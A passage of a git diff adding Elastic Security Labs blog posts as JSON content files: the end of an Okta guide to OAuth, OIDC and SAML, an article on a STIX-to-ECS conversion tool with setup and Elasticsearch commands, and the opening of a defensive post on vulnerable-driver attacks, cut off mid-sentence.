is crucial in multi-tenant environments, where distinct tenants are segregated based on factors like roles, data privacy, and regulatory requirements. Such setups are common in Okta, enabling users to manage diverse access needs efficiently.\n\nIn multi-org environments, Okta facilitates tenants across separate organizations through its UD. The configuration of each tenant is influenced by various factors including cost, performance, and data residency, with user types and profiles forming the basis of tenant setup. Additionally, features like delegated admin support and DNS customization for post-sign-in redirects are instrumental in managing tenant access.\n\nUnderstanding the nuances of tenant configuration in Okta is vital, not only for effective administration but also for comprehending potential security challenges, such as the risk of [poisoned tenants](https://github.com/pushsecurity/saas-attacks/blob/main/techniques/poisoned_tenants/description.md).\n\n# Authorization workflow\n\nAs we discussed earlier, Okta - being an IdP - provides an authorization server as part of its services. It is critical to understand the authorization workflow that happens on the front and back-end channels. For this discussion and examples, we will use the client (end-user), authorization server (Okta), and SP (application server) as the actors involved.\n\n## OAuth 2.0 and OIDC protocols\n\n### High-level overview of OAuth\n\nOAuth 2.0, defined in [RFC 6749](https://datatracker.ietf.org/doc/html/rfc6749), is a protocol for authorization. It enables third-party applications to gain limited access approved by the end-user or resource owner. Operating over HTTPS, it grants access tokens to authorize users, devices, APIs, servers, and applications.\n\nKey OAuth terminology:\n\n[Scopes](https://www.oauth.com/oauth2-servers/scope/defining-scopes/): Define the permissions granted within an access token. They represent session permissions for each interaction with a resource server.\n\nConsent: A process where end users or clients agree or disagree with the permissions (scopes) requested by a client application. For example, a consent screen in Google Workspace.\n\n[Tokens](http://Tokens): Includes access tokens for resource access and refresh tokens for obtaining new access tokens without re-authorizing.\n\n[Grants](https://auth0.com/docs/get-started/applications/confidential-and-public-applications): Data sent to the authorization server to receive an access token, like an authorization code granted post-authentication.\n\n[Clients](https://auth0.com/docs/get-started/applications/confidential-and-public-applications): In OAuth, clients are either 'confidential', able to securely store credentials, or 'public', which cannot.\n\nAuthorization Server: Mints OIDC and OAuth tokens and applies access policies, each with a unique URI and signing key.\n\n[Authorization Endpoint](https://cloudentity.com/developers/basics/oauth-grant-types/authorization-code-flow/#:~:text=The%20user%20authenticates%20with%20their,server%20issues%20an%20authorization%20code.): An API endpoint (/oauth/authorize) for user interaction and authorization.\n\n[Token Endpoint](https://cloudentity.com/developers/basics/oauth-grant-types/authorization-code-flow/#:~:text=The%20user%20authenticates%20with%20their,server%20issues%20an%20authorization%20code.): An API endpoint (/oauth/token) for clients to obtain access or refresh tokens, typically requiring a grant type like authorization code.\n\nResource Server (or Service Provider, SP): Provides services to authenticated users, requiring an access token.\n\nFront-end Channel: Communication between the user’s browser and the authorization or resource server.\n\nBack-end Channel: Machine-to-machine communication, such as between resource and authorization servers.\n\nThis streamlined overview covers the essentials of OAuth in the Okta ecosystem, focusing on its function, key terms, and components.\n\n### High-level overview of OIDC\n\nAt the beginning of this blog, we also discussed how [OIDC](https://openid.net/specs/openid-connect-core-1_0.html) is an identity authentication protocol that sits on top of the OAuth authorization framework. While OAuth provides authorization, it has no current mechanism for authentication, thus where OIDC protocol comes in handy. The identity of the authenticated user is often called the resource owner.\n\nThe OIDC connect flow looks similar to the OAuth flow, however during the initial HTTPS request, scope=openid is added to be used so that not only an access token is returned from the authorization server but an ID token as well.\n\nThe ID token is formatted as a JSON Web Token (JWT) so that the client can extract information about the identity. This is unlike the access token, which the client passes to the resource server every time access is required. Data such as expiration, issuer, signature, email, and more can be found inside the JWT - these are also known as claims.\n\n## Authorization code flow\n\n### Step 1 - Initial authorization request:\n\nThe authorization code flow is initiated when the client sends an HTTP GET request to Okta’s authorization endpoint. This request is crucial in establishing the initial part of the OAuth 2.0 authorization framework.\n\nHere’s a breakdown of the request components:\n\n - Endpoint: The request is directed to ```/oauth2/default/v1/authorize```, which is Okta’s authorization endpoint\n - Parameters:\n - ```response_type=code```: This parameter specified that the application is initiating an authorization code grant type flow.\n - ```client_id```: The unique identifier for the client application registered with Okta.\n - ```redirect_uri```: The URL to which Okta will send the authorization code.\n - ```scope```: Defines the level of access the application is requesting.\n\nExample Request:\n\n```\nGET /oauth2/default/v1/authorize?response_type=code \\ \n&client_id=CLIENT_ID&redirect_uri=REDIRECT_URI&scope=SCOPE\n```\n\n### Step 2 - User authentication and consent:\n\nOnce the request is made, the user is prompted to authenticate with Okta and give consent for the requested scopes. This step is fundamental for user verification and to ensure that the user is informed about the type of access being granted to the application.\n\n### Step 3 - Authorization code reception:\n\nPost authentication and consent, Okta responds to the client with an authorization code. This code is short-lived and is exchanged for a more permanent secret to make further requests - an access token.\n\nExample token exchange request:\n\n```\nPOST /oauth2/default/v1/token\nContent-Type: application/x-www-form-urlencoded\n\ngrant_type=authorization_code&\ncode=AUTHORIZATION_CODE&\nredirect_uri=REDIRECT_URI&\nclient_id=CLIENT_ID&\nclient_secret=CLIENT_SECRET\n```\n\n### Step 4 - Redirect URIs and client authentication\n\nRedirect URIs play a pivotal role in the security of the OAuth 2.0 flow. They are pre-registered URLs to which Okta sends the authorization code. The integrity of these URIs is paramount, as they ensure that the response is only sent to the authorized client.\n\nThe client application is authenticated at the token endpoint, usually by providing the ```client_id``` and ```client_secret```. This step is crucial to verify the identity of the client application and prevent unauthorized access.\n\n### Step 5 - Token exchange\n\nIn the final step, the client makes an HTTP POST request to Okta’s token endpoint, exchanging the authorization code for an access token. This access token is then used to make API requests on behalf of the user.\n\nThe inclusion of client credentials (client ID and client secret) in this request is a critical security measure, ensuring that the token is only issued to the legitimate client. \n\n## Access tokens and scopes\n\nAn [access token](https://www.okta.com/identity-101/access-token/) is a compact code carrying extensive data about a user and their permissions. It serves as a digital key, facilitating communication between a server and a user's device. Commonly used in various websites, access tokens enable functionalities like logging in through one website (like Facebook) to access another (like Salesforce).\n\n### Composition of an access token:\n\nAn access token typically comprises three distinct parts, each serving a specific purpose:\n\n - *Header*: This section contains metadata about the token, including the type of token and the algorithm used for encryption.\n - *Payload (claims)*: The core of the token, includes user-related information, permissions, group memberships, and expiration details. The payload dictates whether a user can access a specific resource, depending on the permissions granted within it. Developers can embed custom data in the payload, allowing for versatile applications, such as a single token granting access to multiple APIs.\n - *Signature*: A hashed verification segment that confirms the token's authenticity. This makes the token secure and challenging to tamper with or replicate.\n\nA common format for access tokens JWT as we previously discussed, which is concise yet securely encodes all necessary information.\n\n### Scopes and permissions:\n\n[Scopes](https://developer.okta.com/docs/api/oauth2/) in OAuth 2.0 are parameters that define the level and type of access the client requests. Each scope translates into specific permissions granted to the access token. For instance, a scope of email would grant the client application access to the user's email address. The granularity of scopes allows for precise control over what the client can and cannot do with the access token, adhering to the principle of least privilege.\n\n### Token lifespan and refresh tokens:\n\nAccess tokens are inherently short-lived for security reasons, reducing the window of opportunity for token misuse in case of unintended disclosure. Okta allows customization of [token lifespans](https://support.okta.com/help/s/article/What-is-the-lifetime-of-the-JWT-tokens?language=en_US#:~:text=ID%20Token%3A%2060%20minutes,Refresh%20Token%3A%2090%20days) to suit different security postures. Once an access token expires, it can no longer be used to access resources.\n\n[Refresh tokens](https://developer.okta.com/docs/guides/refresh-tokens/main/), where employed, serve to extend the session without requiring the user to authenticate again. A refresh token can be exchanged for a new access token, thus maintaining the user's access continuity to the application. The use of refresh tokens is pivotal in applications where the user remains logged in for extended periods.\n\n### Token storage:\n\nRegarding [token storage](https://auth0.com/docs/secure/security-guidance/data-security/token-storage), browser-based applications such as those utilizing services like Okta, are vital secure storage of access tokens is a critical aspect of user session management. These tokens are typically stored using one of several methods: browser in-memory storage, session cookies, or browser local/session storage. In-memory storage, preferred for its strong defense against XSS attacks, holds the token within the JavaScript memory space of the application, although it loses the token upon page refresh or closure. Session cookies offer enhanced security by being inaccessible to JavaScript, thereby reducing XSS vulnerabilities, but require careful implementation to avoid CSRF attacks. Local and session storage options, while convenient, are generally less recommended for sensitive data like access tokens due to their susceptibility to XSS attacks. The choice of storage method will depend on the application where a traditional web page, mobile device, or single-page app is being used.\n\n### Security and expiration:\n\nThe security of access tokens is of paramount importance in safeguarding user authentication and authorization processes, especially during their transmission over the internet. Encrypting these tokens is crucial, as it ensures that their contents remain confidential and impervious to unauthorized access. Equally important is the use of secure communication channels, notably HTTPS, to prevent the interception and compromise of tokens in transit. Furthermore, the signature component of a token, particularly in JWTs, plays a vital role in verifying its authenticity and integrity. This signature confirms that the token has not been altered and is genuinely issued by a trusted authority, thus preventing the risks associated with token forgery and replay attacks.\n\nAccess tokens are inherently designed with expiration mechanisms, a strategic choice to mitigate the risks associated with token theft or misuse. This finite lifespan of tokens necessitates regular renewal, typically managed through refresh tokens, thereby ensuring active session management and reducing opportunities for unauthorized use. The storage and handling of these tokens in client applications also significantly impact their overall security. Secure storage methods, such as in-memory or encrypted cookies, alongside careful management of token renewal processes, are essential to prevent unauthorized access and maintain the robustness of user sessions and access controls.\n\n# Authentication workflow\n\n## Authentication vs authorization\nBefore we dive into authentication in Okta, we should take a moment to understand the difference between authentication and authorization. To put it simply, authentication is providing evidence to prove identity, whereas authorization is about permissions and privileges once access is granted. \n\nAs we discussed throughout this blog, the Identity Engine and UD are critical to identity management in Okta. As a recap, the Identity Engine is used for enrolling, authentications, and authorizing users. The UD is used as the main directory service in Okta that contains users, groups, profiles, and policies, also serving as the source of truth for user data. The UD can be synchronized with other directory services such as AD or LDAP through the Okta endpoint agent.\n\nIdentity management can be managed via Okta or through an external IdP, such as Google Workspace. Essentially, when access to an application is requested, redirection to the authorization server’s endpoint APIs for authentication are generated to provide proof of identity.\n\nBelow are the main authentication protocols between the end user, resource server, and authorization server:\n\n - OIDC: Authentication protocol that sits on top of the OAuth authorization framework. Workflow requires an ID token (JWT) to be obtained during an access token request.\n - SAML: Open standard protocol formatted in XML that facilitates user identity data exchange between SPs and IdPs.\n\nWithin Okta, there is plenty of flexibility and customization regarding authentication. Basic authentication is supported where simple username and password schemes are used over HTTP with additional parameters and configurations.\n\n## SAML in authentication\n\nAs previously stated, [SAML](https://developer.okta.com/docs/concepts/saml/) is a login standard that helps facilitate user access to applications based on HTTP(s) requests and sessions asynchronously. Over time the use of basic credentials for each application quickly became a challenge and thus federated identity was introduced to allow identity authentication across different SPs, facilitated by the identity providers. \n\nSAML is primarily a web-based authentication mechanism as it relies on a flow of traffic between the end user, IdP, and SP. The SAML authentication flow can either be IdP or SP initiated depending on where the end user visits first for application access.\n\nThe SAML request is typically generated by the SP whereas the SAML response is generated by the IdP. The response contains the SAML assertion, which contains information about the authenticated user’s identity and a signed signature by the IdP.\n\nIt is important to note that during the SAML workflow, the IdP and SP typically never communicate directly, but instead rely on the end user’s browser for redirections. Typically, the SP trusts the IdP and thus the identity data forwarded through the user’s web browser to the SP is trusted in access is granted to the application requested.\n\n\n\nIn step 5 from the diagram above, the SAML assertion would be sent as part of this response after the user has authenticated with the IdP. Remember that the assertion is in XML format and can be quite extensive as it contains identity information for the SP to parse and rely on for the end user’s identity verification. Generic examples of SAML assertions are [provided](https://www.samltool.com/generic_sso_res.php) by OneLogin. Auth0 also [provides](https://samltool.io/) a decoder and parser for these examples as well which is shown in the image below.\n\n\n\n## IdP vs SP responsibilities\n\nWhen discussing the roles and responsibilities of the SP and IdP, keep in mind that the SP is meant to provide access to applications for the end user, whereas the IdP provides authentication and authorization. The SP and IdP are typically set up to trust each other with their designated responsibilities. Depending on the end user, workflows for authentication and authorization can be SP or IdP initiated where RESTful API endpoints are typically depended on for each workflow. For authentication, requests and responses are sent from the IdP and SP but often proxied through the end user’s browser.\n\nAlthough Okta is mainly an IdP and provides authentication and authorization services, it can also be used as an SP. Previously we discussed how Okta’s integration network allows for various 3rd-party applications to be connected and accessible to users through their dashboard. We also explained how authentication workflows can be SP initiated, meaning users could visit their Okta dashboard to request access to an application. At the same time, a 3rd-party IdP could be established such as Google Workspace or Azure AD which would handle the authentication and authorization of the user. If the user were to request access with this type of setup, Okta would then redirect the user to Azure AD for authentication.\n\n## Single-factor vs multi-factor authentication\n\nSingle-factor authentication (SFA) is the simplest form of authentication, requiring a user to supply one credential object for authentication. Commonly, users are familiar with password-based authentication methods where a username and password are supplied to validate themselves. This of course has security implications if the credentials used are stolen as they can be used by an adversary to login and access the same resources.\n\nMultifactor authentication (MFA) is similar to SFA, except it requires two or more types of credentials or evidence to be supplied for authentication, typically in sequence. For example, a password-based credential may be supplied and once verified by the IdP, then requested by an OTP be supplied by a mobile device authenticator application, SMS message, email, and others. The common types of authentication factors are something that the user knows, possesses, or is inherent. This also increases the complexity to adversaries based on randomized string generation for OTPs and MFA token expirations.\n\nOkta enables other types of authentication methods such as passwordless, risk-based, biometric, transaction, and others. A full list of authentication methods and descriptions can be found [here](https://developer.okta.com/docs/concepts/iam-overview-authentication-factors/#authentication-methods).\n\nEvery application or integration added to the Okta organization has an [authentication policy](https://help.okta.com/oie/en-us/content/topics/identity-engine/policies/about-app-sign-on-policies.htm), which verifies conditions for users who attempt to access each application. Authentication policies can also help enforce factor requirements based on these conditions where the UD and user profile are used to analyze information about the user. Authentication policies can be set globally for applications and users or can be more granular if set at the application level where specific user conditions are met. Authentication policies can be updated, cloned, preset, and merged if duplicate policies. Rules that define these granular conditions can be applied to these authentication policies with the Okta Expression Language ([EL](https://help.okta.com/oie/en-us/content/topics/identity-engine/devices/el-about.htm)). \n\n## Client-side and server-side communications\n\nUnderstanding the distinction between front-end (user-browser interactions) and back-end (server-to-server communications) is crucial in web-based authentication systems. Front-end interactions typically involve user interfaces and actions, while back-end channels handle critical exchanges like SAML assertions or OAuth tokens, crucial for secure authentication.\n\nIn Okta's framework, the interplay between browser and server is key for security and user experience. When a user logs in via Okta, the browser first authenticates with Okta, which then sends back the necessary tokens. These are forwarded to the application server which validates them with Okta, ensuring a secure, behind-the-scenes token exchange.\n\nOkta’s token management is marked by stringent security. Issued tokens like ID and access tokens are securely exchanged among the user’s browser, Okta, and application servers. Protocols like HTTPS and OAuth 2.0 safeguard these transmissions. Features like token rotation and automatic revocation further bolster security, preventing unauthorized access.\n\nIntegrating Okta into an application reshapes its design and security. This offloads significant security responsibilities, allowing developers to focus on core functions. Such integration leads to a modular architecture, where authentication services are separate from application logic. \n\n# Conclusion\n\nWe’ve unraveled the complexities of Okta’s architecture and services, providing insights into its role as a leader in modern authentication and authorization. With the platform’s utilization of protocols like OAuth, OIDC, and SAML, Okta stands at the forefront of scalable, integrated solutions, seamlessly working with platforms such as Azure AD and Google Workspace.\n\nOkta's SaaS design, featuring a RESTful API, makes it a versatile Identity Provider (IdP) and Service Provider (SP). Yet, its popularity also brings potential security vulnerabilities. For cybersecurity professionals, it’s crucial to grasp Okta’s complexities to stay ahead of evolving threats. This introduction sets the stage for upcoming deeper analyses of Okta's attack surface, the setup of a threat detection lab, and the exploration of common attacks.\n\nArmed with this knowledge, you’re now better equipped to analyze, understand, and mitigate the evolving cybersecurity challenges associated with Okta’s ecosystem.\n"
+ },
+ "title": "Starter guide to understanding Okta",
+ "slug": "starter-guide-to-understanding-okta",
+ "subtitle": "An introduction for security analysts",
+ "date": "2024-01-23",
+ "description": "This article delves into Okta's architecture and services, laying a solid foundation for threat research and detection engineering. Essential reading for those aiming to master threat hunting and detection in Okta environments.",
+ "author": [
+ {
+ "slug": "terrance-dejesus"
+ }
+ ],
+ "image": "photo-edited-09.png",
+ "category": [
+ {
+ "slug": "security-research"
+ }
+ ]
+ },
+ "id": "security_labs_content-starter_guide_to_understanding_okta-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-stixy_situations_ecsaping_your_threat_data-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-stixy_situations_ecsaping_your_threat_data-md.json
new file mode 100644
index 00000000000..43302c755db
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-stixy_situations_ecsaping_your_threat_data-md.json
@@ -0,0 +1,28 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"STIXy Situations: ECSaping your threat data\"\nsubtitle: \"Structured threat data is commonly formatted using STIX. To help get this data into Elasticsearch, we’re releasing a Python script that converts STIX to an ECS format to be ingested into your stack.\"\nslug: \"stixy-situations-ecsaping-your-threat-data\"\ndate: \"2024-02-09\"\ndescription: \"Structured threat data is commonly formatted using STIX. To help get this data into Elasticsearch, we’re releasing a Python script that converts STIX to an ECS format to be ingested into your stack.\"\nauthor:\n - slug: cyril-francois\n - slug: andrew-pease\nimage: \"photo-edited-07@2x.jpg\"\ncategory:\n - slug: tools\n---\n\n## Preamble\nOrganizations that use threat indicators or observables consume, create, and/or (ideally) publish threat data. This data can be used internally or externally as information or intelligence to inform decision-making and event prioritization.\n\nWhile there are several formats for this information to be structured into, the de facto industry standard is [Structured Threat Information Expression (STIX)](https://oasis-open.github.io/cti-documentation/stix/intro). STIX is managed by the [OASIS Cyber Threat Intelligence Technical Committee](https://www.oasis-open.org/committees/tc_home.php?wg_abbrev=cti) and enables organizations to share threat data in a standard and machine-readable format.\n\nAt Elastic, we developed the [Elastic Common Schema (ECS)](https://www.elastic.co/guide/en/ecs/current/ecs-reference.html) as a data normalization capability. “[ECS] is an open source specification, developed with support from the Elastic user community. ECS defines a common set of fields for storing event data in Elasticsearch, such as logs and metrics.” In April of 2023, [Elastic contributed ECS](https://www.elastic.co/blog/ecs-elastic-common-schema-otel-opentelemetry-announcement) to the [OpenTelemetry Semantic Conventions (OTel)](https://opentelemetry.io/docs/concepts/semantic-conventions/) as a commitment to the joint development of an open schema. \n\nThe security community shares threat data in the STIX format, so to store that data in Elasticsearch for analysis and threat detection [[1](https://www.elastic.co/guide/en/security/current/threat-intel-hash-indicator-match.html)] [[2](https://www.elastic.co/guide/en/security/current/threat-intel-ip-address-indicator-match.html)] [[3](https://www.elastic.co/guide/en/security/current/threat-intel-url-indicator-match.html)] [[4](https://www.elastic.co/guide/en/security/current/threat-intel-windows-registry-indicator-match.html)], we created a tool that converts STIX documents into ECS and outputs the threat data either as a file or directly into Elasticsearch indices. If this was a challenge for us, it was a challenge for others - therefore, we decided to release a version of the tool.\n\nThis tool uses the [Elastic License 2.0](https://www.elastic.co/licensing/elastic-license) and is available for download [here](https://github.com/elastic/labs-releases/tree/main/tools/stix-to-ecs).\n\n## Getting started\nThis project will take a STIX 2.x formatted JSON document and create an ECS version. There are three output options: STDOUT as JSON, an NDJSON file, and/or directly to an Elasticsearch cluster.\n\n### Prerequisites\nThe STIX 2 ECS project requires Python 3.10+ and the [stix2](https://pypi.org/project/stix2/), [Elasticsearch](https://pypi.org/project/elasticsearch/), and [getpass](https://pypi.org/project/getpass4/) modules.\n\nIf exporting to Elasticsearch, you will need the host information and authentication credentials. API authentication is not yet implemented.\n\n### Setup\nCreate a virtual environment and install the required prerequisites.\n\n```\ngit clone https://github.com/elastic/labs-releases.git\ncd tools/stix2ecs\npython -m venv /path/to/virtual/environments/stix2ecs\nsource /path/to/virtual/environments/stix2ecs/bin/activate\npython -m pip install -r requirements.txt\n```\n\n## Operation\nThe input is a STIX 2.x JSON document (or a folder of JSON documents); the output defaults to STDOUT, with an option to create an NDJSON file and/or send to an Elasticsearch cluster.\n\n```\nstix_to_ecs.py [-h] -i INPUT [-o OUTPUT] [-e] [--index INDEX] [--url URL] \\\n[--user USER] [-p PROVIDER] [-r]\n```\n\nBy default, the ECS file is named the same as the STIX file input but with `.ecs.ndjson` appended.\n\n### Arguments\nThe script has several arguments, the only mandatory field is `-i` for the input. By default, the script will output the NDJSON document to STDOUT.\n\n| Option | Description |\n| - | - |\n| -h | displays the help menu |\n| -i | specifies the input STIX document (mandatory) |\n| -o | specifies the output ECS document (optional) |\n| -p | defines the ECS provider field (optional) |\n| -r | recursive mode to convert multiple STIX documents (optional) |\n| -e | specifies the Elasticsearch output mode (optional) |\n| --index | defines the Elasticsearch Index, requires `-e` (optional) |\n| --url | defines the Elasticsearch URL, requires `-e` (optional) |\n| --user | defines the Elasticsearch username, requires `-e` (optional) |\n\n## Examples\nThere are two sample files located in the `test-inputs/` directory. One is from [CISA](https://www.cisa.gov/topics/cyber-threats-and-advisories/information-sharing/automated-indicator-sharing-ais) (Cybersecurity & Infrastructure Security Agency), and one is from [OpenCTI](https://github.com/OpenCTI-Platform/opencti) (an open source threat intelligence platform).\n\n### STIX file input to STDOUT\nThis will output the STIX document to STDOUT in ECS format.\n\n```\npython stix_to_ecs.py -i test-inputs/cisa_sample_stix.json | jq\n\n[\n {\n \"threat\": {\n \"indicator\": {\n \"file\": {\n \"name\": \"123.ps1\",\n \"hash\": {\n \"sha256\": \"ED5D694D561C97B4D70EFE934936286FE562ADDF7D6836F795B336D9791A5C44\"\n }\n },\n \"type\": \"file\",\n \"description\": \"Simple indicator of observable {ED5D694D561C97B4D70EFE934936286FE562ADDF7D6836F795B336D9791A5C44}\",\n \"first_seen\": \"2023-11-21T18:57:25.000Z\",\n \"provider\": \"identity--b3bca3c2-1f3d-4b54-b44f-dac42c3a8f01\",\n \"modified_at\": \"2023-11-21T18:57:25.000Z\",\n \"marking\": {\n \"tlp\": \"clear\"\n }\n }\n }\n },\n...\n```\n\n### STIX file input to ECS file output\nThis will create a folder called `ecs` in the present directory and write the ECS file there.\n\n```\npython python stix_to_ecs.py -i test-inputs/cisa_sample_stix.json -o ecs\n\ncat ecs/cisa_sample_stix.ecs.ndjson | jq\n{\n \"threat\": {\n \"indicator\": {\n \"file\": {\n \"name\": \"123.ps1\",\n \"hash\": {\n \"sha256\": \"ED5D694D561C97B4D70EFE934936286FE562ADDF7D6836F795B336D9791A5C44\"\n }\n },\n \"type\": \"file\",\n \"description\": \"Simple indicator of observable {ED5D694D561C97B4D70EFE934936286FE562ADDF7D6836F795B336D9791A5C44}\",\n \"first_seen\": \"2023-11-21T18:57:25.000Z\",\n \"provider\": \"identity--b3bca3c2-1f3d-4b54-b44f-dac42c3a8f01\",\n \"modified_at\": \"2023-11-21T18:57:25.000Z\",\n \"marking\": {\n \"tlp\": \"clear\"\n }\n }\n }\n}\n...\n```\n\n### STIX file input to ECS file output, defining the Provider field\nThe provider field is commonly a GUID in the STIX document. To make it more user-friendly, you can use the `-p` argument to define the `threat.indicator.provider` field.\n\n```\npython stix_to_ecs.py -i test-inputs/cisa_sample_stix.json -o ecs -p \"Elastic Security Labs\"\n\ncat ecs/cisa_sample_stix.ecs.ndjson | jq\n{\n \"threat\": {\n \"indicator\": {\n \"file\": {\n \"name\": \"123.ps1\",\n \"hash\": {\n \"sha256\": \"ED5D694D561C97B4D70EFE934936286FE562ADDF7D6836F795B336D9791A5C44\"\n }\n },\n \"type\": \"file\",\n \"description\": \"Simple indicator of observable {ED5D694D561C97B4D70EFE934936286FE562ADDF7D6836F795B336D9791A5C44}\",\n \"first_seen\": \"2023-11-21T18:57:25.000Z\",\n \"provider\": \"Elastic Security Labs\",\n \"modified_at\": \"2023-11-21T18:57:25.000Z\",\n \"marking\": {\n \"tlp\": \"clear\"\n }\n }\n }\n}\n...\n```\n\n### STIX directory input to ECS file outputs\nIf you have a directory of STIX documents, you can use the `-r` argument to recursively search through the directory and write the ECS documents to the output directory.\n\n```\npython stix_to_ecs.py -ri test-inputs -o ecs\n```\n\n### STIX file input to Elasticsearch output\nTo output to Elasticsearch, you can use either Elastic Cloud or a local instance. Local Elasticsearch will use port `9200` and Elastic Cloud will use port `443`. By default, a valid TLS session to Elasticsearch is required.\n\nFirst, create an index if you don't already have one. In this example, we’re creating an index called `stix2ecs`, but the index name isn’t relevant.\n\n```\ncurl -u {username} -X PUT \"https://elasticsearch:port/stix2ecs?pretty\"\n\n{\n \"acknowledged\" : true,\n \"shards_acknowledged\" : true,\n \"index\" : \"stix2ecs\"\n}\n```\n\nNext, define the Elasticsearch output options.\n\n```\npython stix_to_ecs.py -i test-inputs/cisa_sample_stix.json -e --url https://elasticsearch:port --user username --index stix2ecs\n```\n\nIf you’re storing the data in Elasticsearch for use in another platform, you can view the indicators using cURL.\n\n```\ncurl -u {username} https://elasticsearch:port/stix2ecs/_search?pretty\n\n{\n \"took\" : 2,\n \"timed_out\" : false,\n \"_shards\" : {\n \"total\" : 1,\n \"successful\" : 1,\n \"skipped\" : 0,\n \"failed\" : 0\n },\n \"hits\" : {\n \"total\" : {\n \"value\" : 3,\n \"relation\" : \"eq\"\n },\n \"max_score\" : 1.0,\n \"hits\" : [\n {\n \"_index\" : \"stix2ecs\",\n \"_id\" : \"n2lt8IwBahlUtp0hzm9i\",\n \"_score\" : 1.0,\n \"_source\" : {\n \"threat\" : {\n \"indicator\" : {\n \"file\" : {\n \"name\" : \"123.ps1\",\n \"hash\" : {\n \"sha256\" : \"ED5D694D561C97B4D70EFE934936286FE562ADDF7D6836F795B336D9791A5C44\"\n }\n },\n \"type\" : \"file\",\n \"description\" : \"Simple indicator of observable {ED5D694D561C97B4D70EFE934936286FE562ADDF7D6836F795B336D9791A5C44}\",\n \"first_seen\" : \"2023-11-21T18:57:25.000Z\",\n \"provider\" : \"identity--b3bca3c2-1f3d-4b54-b44f-dac42c3a8f01\",\n \"modified_at\" : \"2023-11-21T18:57:25.000Z\",\n \"marking\" : {\n \"tlp\" : \"clear\"\n }\n }\n }\n }\n }\n...\n```\n\nIf you’re using Kibana, you can [create a Data View](https://www.elastic.co/guide/en/kibana/current/data-views.html) for your `stix2ecs` index to view the ingested indicators. \n\n\n\n\nFinally, you can use this as an indicator source for [Indicator Match rules](https://www.elastic.co/guide/en/security/current/prebuilt-rule-1-0-2-threat-intel-indicator-match.html).\n\n\n\n\n## Summary\nWe hope this project helps your organization analyze and operationalize your threat data. If you’re new to the Elastic Common Schema, you can learn more about that [here](https://www.elastic.co/guide/en/ecs/current/index.html). \n\nAs always, please feel free to open an [issue](https://github.com/elastic/labs-releases/issues) with any questions, comments, concerns, or complaints. \n\n## About Elastic Security Labs\nElastic Security Labs is the threat intelligence branch of Elastic Security dedicated to creating positive change in the threat landscape. Elastic Security Labs provides publicly available research on emerging threats with an analysis of strategic, operational, and tactical adversary objectives, then integrates that research with the built-in detection and response capabilities of Elastic Security.\n\nFollow Elastic Security Labs on Twitter [@elasticseclabs](https://twitter.com/elasticseclabs?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor) and check out our research at [www.elastic.co/security-labs/](https://www.elastic.co/security-labs/). \n"
+ },
+ "title": "STIXy Situations: ECSaping your threat data",
+ "slug": "stixy-situations-ecsaping-your-threat-data",
+ "subtitle": "Structured threat data is commonly formatted using STIX. To help get this data into Elasticsearch, we’re releasing a Python script that converts STIX to an ECS format to be ingested into your stack.",
+ "date": "2024-02-09",
+ "description": "Structured threat data is commonly formatted using STIX. To help get this data into Elasticsearch, we’re releasing a Python script that converts STIX to an ECS format to be ingested into your stack.",
+ "author": [
+ {
+ "slug": "cyril-francois"
+ },
+ {
+ "slug": "andrew-pease"
+ }
+ ],
+ "image": "photo-edited-07@2x.jpg",
+ "category": [
+ {
+ "slug": "tools"
+ }
+ ]
+ },
+ "id": "security_labs_content-stixy_situations_ecsaping_your_threat_data-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-stopping_vulnerable_driver_attacks-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-stopping_vulnerable_driver_attacks-md.json
new file mode 100644
index 00000000000..049b5f859a2
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-stopping_vulnerable_driver_attacks-md.json
@@ -0,0 +1,28 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Stopping Vulnerable Driver Attacks\"\nslug: \"stopping-vulnerable-driver-attacks\"\ndate: \"2023-03-01\"\nsubtitle: \"Using vulnerable drivers to gain kernel mode execution.\"\ndescription: \"This post includes a primer on kernel mode attacks, along with Elastic’s recommendations for securing users from kernel attacks leveraging vulnerable drivers.\"\nauthor:\n - slug: joe-desimone\nimage: \"blog-thumb-clock-gears.jpg\"\ncategory:\n - slug: security-operations\n - slug: detection-science\n---\n\n## Key takeaways\n\n- Ransomware actors are leveraging vulnerable drivers to tamper with endpoint security products.\n- Elastic Security [released](https://github.com/elastic/protections-artifacts/search?q=VulnDriver) 65 YARA rules to detect vulnerable driver abuse.\n- Elastic Endpoint (8.3+) protects users from this threat.\n\n## Background\n\nIn 2018, [Gabriel Landau](https://twitter.com/GabrielLandau) and [Joe Desimone](https://twitter.com/dez_) presented a [talk](https://i.blackhat.com/us-18/Thu-August-9/us-18-Desimone-Kernel-Mode-Threats-and-Practical-Defenses.pdf) at Black Hat covering the evolution of kernel mode threats on Windows. The most concerning trend was towards leveraging known good but vulnerable drivers to gain kernel mode execution. We showed this was practical, even with hypervisor mode integrity protection ([HVCI](https://docs.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-hvci-enablement)) and Windows Hardware Quality Labs ([WHQL](https://docs.microsoft.com/en-us/windows-hardware/drivers/install/whql-release-signature)) signing requirement enabled. At the time, the risk to everyday users was relatively low, as these techniques were mostly leveraged by advanced state actors and top red teams.\n\nFast forward to 2022, and attacks leveraging vulnerable drivers are a growing concern due to a [proliferation](https://github.com/hfiref0x/KDU) of open source [tools](https://github.com/br-sn/CheekyBlinder) to perform these [attacks](https://github.com/Cr4sh/KernelForge). Vulnerable drivers have now been [used by ransomware](https://news.sophos.com/en-us/2020/02/06/living-off-another-land-ransomware-borrows-vulnerable-driver-to-remove-security-software/) to terminate security software before encrypting the system. Organizations can reduce their risk by limiting administrative user permissions. However, it is also imperative for security vendors to protect the user-to-kernel boundary because once an attacker can execute code in the kernel, security tools can no longer effectively protect the host. Kernel access gives attackers free rein to tamper or terminate endpoint security products or inject code into protected processes.\n\nThis post includes a primer on kernel mode attacks, along with Elastic’s recommendations for securing users from kernel attacks leveraging vulnerable drivers.\n\n## Attack flow\n\nThere are a number of flaws in drivers that can allow attackers to gain kernel mode access to fully compromise the system and remain undetected. Some of the [most 